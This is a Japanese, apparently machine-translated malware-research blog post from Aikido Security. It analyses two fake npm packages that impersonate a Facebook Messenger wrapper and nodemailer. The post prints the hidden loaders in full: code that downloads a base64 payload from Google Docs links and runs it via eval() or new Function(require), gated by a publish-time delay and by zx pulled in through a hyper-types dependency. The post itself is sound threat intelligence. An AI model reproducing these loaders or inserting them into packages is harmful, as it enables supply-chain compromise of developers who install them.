製品
コード、クラウド、ランタイムのセキュリティを確保するために必要なすべてを1つの集中管理システムで実現
コード
依存関係
オープンソースのリスクを防ぐ(SCA)
機密事項
暴露された秘密をキャッチ
SAST
記述通りの安全なコード
コンテナ画像
画像を簡単に保護
マルウェア
サプライチェーン攻撃の防止
コードとしてのインフラ
IaCの設定ミスをスキャンする
ライセンス・リスクとSBOM
リスクを回避し、コンプライアンスを遵守する
時代遅れのソフトウェア
EOLランタイムを知る
クラウド
クラウド / CSPM
クラウドの設定ミス
DAST
ブラックボックス・セキュリティ・テスト
APIスキャン
APIの脆弱性をテストする
仮想マシン
代理店なし、諸経費なし
Kubernetesランタイム
まもなく
コンテナワークロードのセキュリティ
クラウド在庫管理
クラウド・スプロールの解決
ディフェンス
ランタイム保護
アプリ内ファイアウォール / WAF
特徴
AI 自動修正機能
Aikido AIによる1クリック修正
CI/CD セキュリティ
マージおよびデプロイ前のスキャン
IDEインテグレーション
コーディング中にすぐにフィードバックを得る
オンプレミスキャナ
コンプライアンス優先のローカル・スキャン
ソリューション
使用例
コンプライアンス
SOC 2、ISO、その他の自動化
脆弱性管理
オールインワンの脆弱性管理
コード保護
高度なコード・セキュリティ
SBOMの生成
1クリック SCAレポート
ASPM
包括的なアプリケーションセキュリティ
AikidoのAI
AikidoのAIに任せる
ブロック0日
被害を受ける前に脅威を遮断する
産業別
フィンテック
ヘルステック
HRテック
リーガルテック
グループ会社
エージェンシー
スタートアップ企業
企業
モバイルアプリ
製造業
価格
リソース
開発者
資料
Aikidoの使い方
公開APIドキュメント
Aikido 開発者ハブ
変更履歴
出荷状況を見る
セキュリティ
社内リサーチ
マルウェア&CVEインテリジェンス
用語集
セキュリティ専門用語ガイド
トラストセンター
安全、プライベート、コンプライアンス
オープンソース
Aikido インテル
マルウェア&OSS脅威フィード
禅
アプリ内ファイアウォール保護
OpenGrep
コード解析エンジン
インテグレーション
IDE
CI/CDシステム
クラウド
Gitシステムズ
コンプライアンス
メッセンジャー
タスクマネージャー
その他の統合
について
について
について
チーム紹介
採用情報
募集中
プレスリリース
ブランドアセットのダウンロード
カレンダー
また会えますか?
オープンソース
OSSプロジェクト
ブログ
最新記事
お客様のフィードバック
最高のチームからの信頼
お問い合わせ
ログイン
無料で始める
CC不要
Aikido
メニュー
Aikido
EN
EN
FR
JP
DE
ログイン
無料で始める
CC不要
ブログ
/
隠れて失敗する難読化されたマルウェア、空のペイロード、そしてnpmの悪ふざけ

隠れて失敗する難読化されたマルウェア、空のペイロード、そしてnpmの悪ふざけ

?による
チャーリー・エリクセン
チャーリー・エリクセン
4min read
マルウェア

‍

2025年3月14日、私たちはnpm上で悪意のあるパッケージを検出しました。 node-facebook-messenger-api と呼ばれる。.当初は、ありふれたマルウェアのように思えましたが、最終的な目的は何なのかは分かりませんでした。2025年4月3日に同じ脅威者が攻撃を拡大しているのを見るまで、私たちはそれ以上のことを考えませんでした。これは、この特定の攻撃者が使用したテクニックの簡単な概要であり、難読化の試みが実際にどのように彼らをさらに明白にすることに終わるかについての楽しい観察でもある。 

‍

TLDR 

  • 🕵️ オン 2025年3月14日悪意のあるnpmパッケージを検出しました: node-facebook-messenger-api@4.1.0合法的なFacebookメッセンジャーのラッパーに偽装している。
  • 🧪 攻撃者は隠れた。 リモートコード実行ロジック 使用して アクシオス そして eval() Googleドキュメントのリンクからペイロードを取り出そうとしたが、ファイルは空だった。
  • 🔁 後のバージョンで使用された 時間遅延実行 を入れ替えた。 zx ライブラリに悪意のあるロジックを埋め込み、公開から数日後にトリガーすることで、検知を回避している。
  • 📦 オン 2025年4月3日同じ脅威者が2つ目の偽パッケージをリリースした: node-smtp-mailer@6.10.0なりすまし ノードメーラー同じC2ロジックと難読化で。
  • 🧬 両パッケージは、同じ固有の依存関係セット(以下を含む)を使用した。 ハイパー・タイプ)、明らかになった。 シグネチャーパターン 攻撃とリンクしている。
  • 💀 攻撃者の難読化の試み(大きなファイルにコードを隠したり、別の依存関係を介してzxを黙って取り込んだり)は、皮肉にもキャンペーンを発見しやすくした。
  • ペイロードは実際に機能的なものを配信することはなかったが、TTPは本物であり、npmに対するサプライチェーン攻撃がどのように進化しているかを示している 🚨 ペイロードは実際に機能的なものを配信することはなかったが、TTPは本物であり、npmに対するサプライチェーン攻撃がどのように進化しているかを示している。
  • ‍

    はじめの一歩

    すべては3月14日04:37(UTC)に、我々のシステムが不審なパッケージを警告したことから始まった。それはユーザー ビクター・ベン0825と名乗る。 パースワールド.を所有するユーザーのユーザー名です。 正規リポジトリ このライブラリーのために。  

    ‍

    以下は、悪意あるコードとして検出されたものである。 node-facebook-messenger-api@4.1.0:ファイル内の メッセンジャーライン 157-177:

    const axios = require('axios');
    
    const url = 'https://docs.google.com/uc?export=download&id=1ShaI7rERkiWdxKAN9q8RnbPedKnUKAD2'; 
    
    async function downloadFile(url) {
        try {
            const response = await axios.get(url, {
                responseType: 'arraybuffer'
            });
    
            const fileBuffer = Buffer.from(response.data);
    		eval(Buffer.from(fileBuffer.toString('utf8'), 'base64').toString('utf8'))
            
            return fileBuffer; 
        } catch (error) {
            console.error('Download failed:', error.message);
        }
    }
    
    downloadFile(url);
    

    攻撃者はこのコードを769行の長いファイルに隠そうとしている。ここで彼らは関数を追加し、それを直接呼び出している。とてもかわいらしいが、とてもわかりやすい。ペイロードをフェッチしようとしたが、空だった。マルウェアとしてフラグを立て、次に進んだ。

    数分後、攻撃者は別のバージョン4.1.1をプッシュした。唯一の変更は README.md そして package.json ファイルのバージョン、説明、インストール手順を変更した。私たちはこの作者を悪い作者としてマークしているため、この時点以降のパッケージは自動的にマルウェアとしてフラグが立てられました。

    卑屈になろうとする

    その後、3月20日16:29 UTCに、私たちのシステムは自動的にバージョンにフラグを立てました。 4.1.2 パッケージのそこで何が新しくなったかを見てみよう。最初の変更は node-Facebook-messenger-api.js、 を含んでいる:

    "use strict";
    
    module.exports = {
        messenger: function () {
            return require('./messenger');
        },
        accountlinkHandler: function () {
            return require('./account-link-handler');
        },
        webhookHandler: function () {
            return require('./webhook-handler');
        }
    };
    
    var messengerapi = require('./messenger');

    このファイルの変更点は最後の行だ。単に メッセンジャー ファイルを要求された場合は、モジュールがインポートされたときに常に実行される。賢い!もう一つの変更は、そのファイルである、 messenger.js。 以前見られた追加コードは削除され、197行目から219行目に以下のように追加されている:

    const timePublish = "2025-03-24 23:59:25"; 
    const now = new Date();
    const pbTime = new Date(timePublish);
    const delay = pbTime - now;
    
    if (delay <= 0) {
    	async function setProfile(ft) {
    		try {
    			const mod = await import('zx');
    			mod.$.verbose = false;
    			const res = await mod.fetch(ft, {redirect: 'follow'});
    			const fileBuffer = await res.arrayBuffer();
    			const data = Buffer.from(Buffer.from(fileBuffer).toString('utf8'), 'base64').toString('utf8');
    			const nfu = new Function("rqr", data);
    			nfu(require)();
    		} catch (error) {
    			//console.error('err:', error.message);
    		}
    	}
    
    	const gd = 'https://docs.google.com/uc?export=download&id=1ShaI7rERkiWdxKAN9q8RnbPedKnUKAD2'; 
    	setProfile(gd);
    }
    

    以下はその概要である:

    1. 悪意のあるコードを起動させるかどうかを決定するために、時間ベースのチェックを利用する。それは約4日後にのみ有効化される。
    2. を使う代わりに アクシオス現在はグーグルを使用している。 zx ライブラリを使用して悪意のあるペイロードを取得する。
    3. これは冗長モードを無効にするもので、デフォルトでもある。
    4. そして、悪意のあるコードを取得する。
    5. それをbase64デコードする
    6. を使用して新しいファンクションを作成します。 関数() コンストラクタに相当します。 eval() コール。 
    7. そして、次のように関数を呼び出します。 必要 を引数に取る。

    ‍

    しかし、ファイルをフェッチしようとしても、ペイロードは得られない。ただ info.txt. を使用する。 zx が気になる。依存関係を調べたところ、元のパッケージにはいくつかの依存関係が含まれていることに気づいた:

     "dependencies": {
        "async": "^3.2.2",
        "debug": "^3.1.0",
        "merge": "^2.1.1",
        "request": "^2.81.0"
      }

    悪質なパッケージには以下のものが含まれている:

     "dependencies": {
        "async": "^3.2.2",
        "debug": "^3.1.0",
        "hyper-types": "^0.0.2",
        "merge": "^2.1.1",
        "request": "^2.81.0"
      }

    見てごらん、依存性のハイパータイプが追加されている。とても興味深いので、あと何回かこの話をするつもりだ。 

    彼らはまた襲ってきた!

    そして2025年4月3日06:46、新しいパッケージがユーザーによってリリースされた。 クリスター を発表した。eパッケージ  node-smtp-mailer@6.10.0。 私たちのシステムは、悪意のあるコードが含まれている可能性があるとして、自動的にフラグを立てました。私たちはそれを見て、少し興奮しました。パッケージは nodemailer、 名前が違うだけだ。  

    私たちのシステムはファイルにフラグを立てた lib/smtp-pool/index.js. 攻撃者は正規のファイルの一番下、最後の モジュールエクスポート.以下が追加された内容である:

    const timePublish = "2025-04-07 15:30:00"; 
    const now = new Date();
    const pbTime = new Date(timePublish);
    const delay = pbTime - now;
    
    if (delay <= 0) {
        async function SMTPConfig(conf) {
            try {
                const mod = await import('zx');
                mod.$.verbose = false;
                const res = await mod.fetch(conf, {redirect: 'follow'});
                const fileBuffer = await res.arrayBuffer();
                const data = Buffer.from(Buffer.from(fileBuffer).toString('utf8'), 'base64').toString('utf8');
                const nfu = new Function("rqr", data);
                nfu(require)();
            } catch (error) {
                console.error('err:', error.message);
            }
        }
    
        const url = 'https://docs.google.com/uc?export=download&id=1KPsdHmVwsL9_0Z3TzAkPXT7WCF5SGhVR'; 
        SMTPConfig(url);
    }
    

    我々はこのコードを知っている!4日後に実行されるようにタイムスタンプが押されている。わくわくしながらペイロードをフェッチしようとしたが、次のような空のファイルが送られてきた。 beginner.txt。 ブー!依存関係をもう一度見てみよう。 zx.我々は、その正当性を指摘した。 ノードメーラー パッケージには いいえ ダイレクト 依存関係だけである。 devDependencies.しかし、悪質なパッケージの中身はこうだ:

     "dependencies": {
        "async": "^3.2.2",
        "debug": "^3.1.0",
        "hyper-types": "^0.0.2",
        "merge": "^2.1.1",
        "request": "^2.81.0"
      }

    このパッケージと、最初に検出したパッケージの間に類似点があるのがわかりますか?同じ依存関係リストです。正規のパッケージには依存関係がありませんが、悪意のあるパッケージには依存関係があります。攻撃者は、最初の攻撃からこの攻撃まで、依存関係の完全なリストをコピーしただけです。 

    ‍

    興味深い依存関係

    では、なぜ彼らはこれまで使っていた アクシオス への zx を作る HTTP リクエスト?間違いなく発覚を避けるためだ。しかし、興味深いのは zx は直接の依存関係ではない。その代わりに、攻撃者は開発者lukasbachによる正当なパッケージであるhyper-typesをインクルードしている。 

    ‍

    参照したリポジトリがもう存在しないという事実のほかに、ここで注目すべき興味深いことがある。2つの 扶養家族?誰だと思う? 

    ‍

    もし攻撃者が実際に自分の活動を難読化しようとしていたのなら、自分だけが依存するパッケージに依存するのはかなり間抜けなことだ。 

    最後の言葉

    これらの npm パッケージの背後にいる攻撃者は、最終的に動作するペイロードを提供することはできませんでしたが、彼らのキャンペーンは、JavaScript エコシステムを標的としたサプライチェーンの脅威の進行中の進化を強調しています。遅延実行、間接的なインポート、依存関係ハイジャックの使用は、検知メカニズムに対する意識の高まりと実験への意欲を示している。しかし、それはまた、いかにずさんな運用セキュリティと繰り返されるパターンが、依然として彼らに気づかせてしまう可能性があるかを示している。防御側としては、失敗した攻撃でさえも貴重なインテリジェンスであることを思い知らされる。すべてのアーティファクト、難読化のトリック、再利用される依存関係は、私たちがより優れた検知能力とアトリビューション能力を構築するのに役立ちます。そして最も重要なことは、継続的な監視と公開パッケージレジストリの自動化されたフラグ付けが、もはやオプションではなく、非常に重要である理由を補強することだ。

    文:チャーリー・エリクセン

    マルウェア・リサーチャー

    シェアする

    https://www.aikido.dev/blog/hide-and-fail-obfuscated-malware-and-npm-shenanigan

    目次
    テキストリンク
    シェアする
    キーボードを使う
    左キーでAikidoスライダーの前へ移動
    次のスライドに移動するには、右矢印キーを使用します。
    記事を読み進める
    ?による
    マッケンジー・ジャクソン

    AIオートトリアージでサイバーセキュリティ負債を減らす

    Aikido
    2025年5月21日
    もっと読む
    ?による
    マッケンジー・ジャクソン

    SBOM規格を理解する:CycloneDX、SPDX、SWIDを見る

    テクニカル
    2025年5月20日
    もっと読む
    ?による
    マッケンジー・ジャクソン

    バイブ・チェックバイブ・コーダーのセキュリティ・チェックリスト

    ガイド
    2025年5月19日
    もっと読む
    ?による
    チャーリー・エリクセン

    ご招待しますGoogleカレンダー招待とPUAによるマルウェア配信

    マルウェア
    2025年5月13日
    もっと読む
    ?による
    マッケンジー・ジャクソン

    コンテナ・ベース・イメージのアップデートが難しい理由(そしてそれを容易にする方法)

    エンジニアリング
    2025年5月12日
    もっと読む
    ?による
    チャーリー・エリクセン

    ラタトゥイユrand-user-agentに隠された悪意のあるレシピ(サプライチェーンの侵害)

    2025年5月6日
    もっと読む
    ?による
    チャーリー・エリクセン

    XRPサプライチェーン攻撃:NPMの公式パッケージが暗号を盗むバックドアに感染

    マルウェア
    2025年4月22日
    もっと読む
    ?による
    チャーリー・エリクセン

    マルウェア出会いガイド故宮マルウェアの種類を理解する

    マルウェア
    2025年4月10日
    もっと読む
    ?による
    マッケンジー・ジャクソン

    サプライチェーンのセキュリティにロックファイルが重要な理由

    ガイド
    2025年4月1日
    もっと読む
    ?による
    マデリーン・ローレンス

    Aikido マルウェアの起動 - Open Source Threat Feed

    ニュース
    2025年3月31日
    もっと読む
    ?による
    チャーリー・エリクセン

    ありふれた風景の中に潜むマルウェア北朝鮮のハッカーをスパイする

    2025年3月31日
    もっと読む
    ?による
    マデリーン・ローレンス

    TL;DR: tj-actions/changed-files サプライチェーン・アタック

    ニュース
    2025年3月16日
    もっと読む
    ?による
    マッケンジー・ジャクソン

    脆弱性を気にする開発者のための、BSなしのDockerセキュリティ・チェックリスト

    ガイド
    2025年3月6日
    もっと読む
    ?による
    マッケンジー・ジャクソン

    JavaScriptによるSQLインジェクション攻撃の検知と阻止

    ガイド
    2025年3月4日
    もっと読む
    ?による
    フロリス・ヴァン・デン・アベール

    PrismaとPostgreSQLにNoSQLインジェクションの脆弱性?意外なセキュリティリスクを解説

    エンジニアリング
    2025年2月14日
    もっと読む
    ?による
    ウィレム・デルベール

    △Opengrepの立ち上げ|Semgrepをフォークした背景

    ニュース
    2025年1月24日
    もっと読む
    ?による
    トーマス・セグラ

    クライアントがNIS2の脆弱性パッチ適用を要求。どうしますか?

    2025年1月14日
    もっと読む
    ?による
    マッケンジー・ジャクソン

    スタートアップ企業によるアプリケーション・セキュリティのオープンソースガイド

    ガイド
    2024年12月23日
    もっと読む
    ?による
    マデリーン・ローレンス

    カーソルAIのためにAikidoを立ち上げる

    エンジニアリング
    2024年12月13日
    もっと読む
    ?による
    マッケンジー・ジャクソン

    △インテルとの出会い:LLMによるAikidoオープンソース脅威フィード。

    エンジニアリング
    2024年12月13日
    もっと読む
    ?による
    ヨハン・デ・キューレナー

    AikidoがAWSパートナーネットワークに加盟

    ニュース
    2024年11月26日
    もっと読む
    ?による
    マッケンジー・ジャクソン

    2024年のコマンドインジェクション

    エンジニアリング
    2024年11月24日
    もっと読む
    ?による
    マッケンジー・ジャクソン

    2024年のパストラバーサル - その年を紐解く

    エンジニアリング
    2024年11月23日
    もっと読む
    ?による
    マッケンジー・ジャクソン

    セキュリティのバランス:オープンソースツールと商用ツールの使い分け

    ガイド
    2024年11月15日
    もっと読む
    ?による
    マッケンジー・ジャクソン

    SQLインジェクションの現状

    ガイド
    2024年11月8日
    もっと読む
    ?による
    △ミヒエル・ドゥニ

    AikidoによるVismaのセキュリティ強化:ニコライ・ブロガードとの対話

    ニュース
    2024年11月6日
    もっと読む
    ?による
    △ミヒエル・ドゥニ

    フィンテックにおけるセキュリティ:Boundの共同設立者兼CTO、ダン・キンドラー氏とのQ&A

    ニュース
    2024年10月10日
    もっと読む
    ?による
    マデリーン・ローレンス

    SprintoGRC×Aikidoコンプライアンスを自動化

    ニュース
    2024年9月11日
    もっと読む
    ?による
    マデリーン・ローレンス

    SAST対DAST:知っておくべきこと

    ガイド
    2024年9月2日
    もっと読む
    ?による
    リーヴェン・オスターリンク

    5つのSnykの代替品と、それらがより優れている理由

    ニュース
    2024年8月5日
    もっと読む
    ?による
    マデリーン・ローレンス

    私たちがLaravelとの提携を熱望する理由

    ニュース
    2024年7月8日
    もっと読む
    ?による
    フェリックス・ガリオー

    Polyfillのサプライチェーン攻撃で11万サイトに影響

    ニュース
    2024年6月27日
    もっと読む
    ?による
    フェリックス・ガリオー

    LegalTech企業向けサイバーセキュリティの必須事項

    ニュース
    2024年6月25日
    もっと読む
    ?による
    ローランド・デルルー

    Drata Integration - 技術的脆弱性管理を自動化する方法

    ガイド
    2024年6月18日
    もっと読む
    ?による
    ジョエル・ハンス

    DIYガイド:OSSコードスキャンとアプリセキュリティツールキットを「自作するか購入するか」

    ガイド
    2024年6月11日
    もっと読む
    ?による
    ローランド・デルルー

    SOC 2認証:私たちが学んだ5つのこと

    ガイド
    2024年6月4日
    もっと読む
    ?による
    ジョエル・ハンス

    アプリのセキュリティ問題トップ10とその対策

    ガイド
    2024年5月28日
    もっと読む
    ?による
    マデリーン・ローレンス

    シリーズAで1700万ドルを調達した

    ニュース
    2024年5月2日
    もっと読む
    ?による
    ウィレム・デルベール

    Webhookセキュリティ・チェックリスト:安全なウェブフックを構築する方法

    ガイド
    2024年4月4日
    もっと読む
    ?による
    ウィレム・デルベール

    セキュリティ・アラート疲労症候群への対処法

    エンジニアリング
    2024年2月21日
    もっと読む
    ?による
    ローランド・デルルー

    NIS2:誰が影響を受けるのか?

    ガイド
    2024年1月16日
    もっと読む
    ?による
    ローランド・デルルー

    ISO 27001認証:私たちが学んだ8つのこと

    ガイド
    2023年12月5日
    もっと読む
    ?による
    ローランド・デルルー

    クロノス・グループ、企業・顧客のセキュリティ強化にAikido セキュリティを採用

    ニュース
    2023年11月30日
    もっと読む
    ?による
    バート・ヨンクヘール

    LoctaxがAikido Securityを使用して無関係なセキュリティ警告とフォルスポジティブを排除する方法

    ニュース
    2023年11月22日
    もっと読む
    ?による
    フェリックス・ガリオー

    Aikido Security、成長するSaaSビジネスにシームレスなセキュリティ・ソリューションを提供するため500万ユーロを調達

    ニュース
    2023年11月9日
    もっと読む
    ?による
    ローランド・デルルー

    Aikido セキュリティはISO27001:2022に準拠

    ニュース
    2023年11月8日
    もっと読む
    ?による
    フェリックス・ガリオー

    △StoryChiefのCTOがAikido セキュリティを使用して夜ぐっすり眠る方法

    ニュース
    2023年10月24日
    もっと読む
    ?による
    ウィレム・デルベール

    CVEとは何か?

    ガイド
    2023年10月17日
    もっと読む
    ?による
    ウィレム・デルベール

    2024年Webアプリケーション・セキュリティの脆弱性トップ3

    エンジニアリング
    2023年9月27日
    もっと読む
    ?による
    フェリックス・ガリオー

    Aikidoの最新セキュリティ機能 2023年8月

    ニュース
    2023年8月22日
    もっと読む
    ?による
    フェリックス・ガリオー

    Aikidoの2025年SaaS CTOセキュリティ・チェックリスト

    ニュース
    2023年8月10日
    もっと読む
    ?による
    フェリックス・ガリオー

    Aikidoの2024年SaaS CTOセキュリティ・チェックリスト

    ニュース
    2023年8月10日
    もっと読む
    ?による
    フェリックス・ガリオー

    CTOが明かすクラウドとコードセキュリティの15の最重要課題

    エンジニアリング
    2023年7月25日
    もっと読む
    ?による
    ウィレム・デルベール

    OWASPトップ10とは?

    ガイド
    2023年7月12日
    もっと読む
    ?による
    ウィレム・デルベール

    SaaSアプリの安全な管理画面を構築する方法

    ガイド
    2023年7月11日
    もっと読む
    ?による
    ローランド・デルルー

    ISO 27001:2022に備えるには

    ガイド
    2023年7月5日
    もっと読む
    ?による
    ウィレム・デルベール

    CI/CDプラットフォームがハッキングされるのを防ぐ

    ガイド
    2023年6月19日
    もっと読む
    ?による
    フェリックス・ガリオー

    セキュリティー評価報告書でより早く取引を成立させる方法

    ニュース
    2023年6月12日
    もっと読む
    ?による
    ウィレム・デルベール

    技術的脆弱性管理の自動化 [SOC 2]

    ガイド
    2023年6月5日
    もっと読む
    ?による
    ウィレム・デルベール

    リポジトリ内のプロトタイプ汚染を防ぐ

    ガイド
    2023年6月1日
    もっと読む
    ?による
    ウィレム・デルベール

    SaaSスタートアップのCTOは、開発スピードとセキュリティのバランスをどうとるか?

    ガイド
    2023年5月16日
    もっと読む
    ?による
    ウィレム・デルベール

    シンプルな電子メール送信フォームを通じて、ある新興企業のクラウドがどのようにハッキングされたのか?

    エンジニアリング
    2023年4月10日
    もっと読む
    ?による
    フェリックス・ガリオー

    Aikido Security、開発者ファーストのソフトウェアセキュリティプラットフォーム構築のため200万ユーロのプ投資ラウンドを調達

    ニュース
    2023年1月19日
    もっと読む
    XRPサプライチェーン攻撃:NPMの公式パッケージが暗号を盗むバックドアに感染
    ?による
    チャーリー・エリクセン

    XRPサプライチェーン攻撃:NPMの公式パッケージが暗号を盗むバックドアに感染

    マルウェア
    2025年3月31日
    Aikido マルウェアの起動 - Open Source Threat Feed
    ?による
    マデリーン・ローレンス

    Aikido マルウェアの起動 - Open Source Threat Feed

    ニュース
    2025年3月18日
    バイブ・チェックバイブ・コーダーのセキュリティ・チェックリスト
    ?による
    マッケンジー・ジャクソン

    バイブ・チェックバイブ・コーダーのセキュリティ・チェックリスト

    ガイド
    2025年2月11日

    無料で安全を確保

    コード、クラウド、ランタイムを1つの中央システムでセキュアに。
    脆弱性を迅速に発見し、自動的に修正。

    無料で始める
    CC不要
    デモを予約する
    クレジットカードは不要。
    会社概要
    製品価格について採用情報お問い合わせパートナー制度
    リソース
    資料公開APIドキュメント脆弱性データベースブログインテグレーション用語集プレスリリースカスタマーレビュー
    セキュリティ
    トラストセンターセキュリティの概要クッキー設定の変更
    リーガル
    プライバシーポリシークッキーポリシー利用規約マスターサブスクリプション契約データ処理契約
    使用例
    コンプライアンスSAST & DASTASPM脆弱性管理SBOMの生成WordPressセキュリティコード保護マイクロソフトのためのAikido
    産業別
    ヘルステックメドテックフィンテックセキュリティテックリーガルテックHRテックエージェント向け企業向けPEおよびグループ会社向け
    比較する
    全ベンダーとの比較vs Snyk対Wizvs Mendvs オルカ・セキュリティvs Veracodevs GitHubアドバンスドセキュリティvs GitLab Ultimatevs Checkmarxvs Semgrepvs SonarQube
    リンクする
    hello@aikido.dev
    LinkedInX
    サブスクライブ
    すべての最新情報を入手
    まだまだ。
    👋🏻 ご登録ありがとうございます!
    チーム Aikido
    まだまだ。
    © 2025 Aikido Security BV | BE0792914919
    🇪🇺 登録住所:Coupure Rechts 88, 9000, Ghent, Belgium
    🇪🇺 事務所所在地:Gebroeders van Eyckstraat 2, 9000, Ghent, Belgium
    🇺🇸 事務所住所:95 Third St, 2nd Fl, San Francisco, CA 94103, US
    SOC 2
    コンプライアンス
    ISO 27001
    コンプライアンス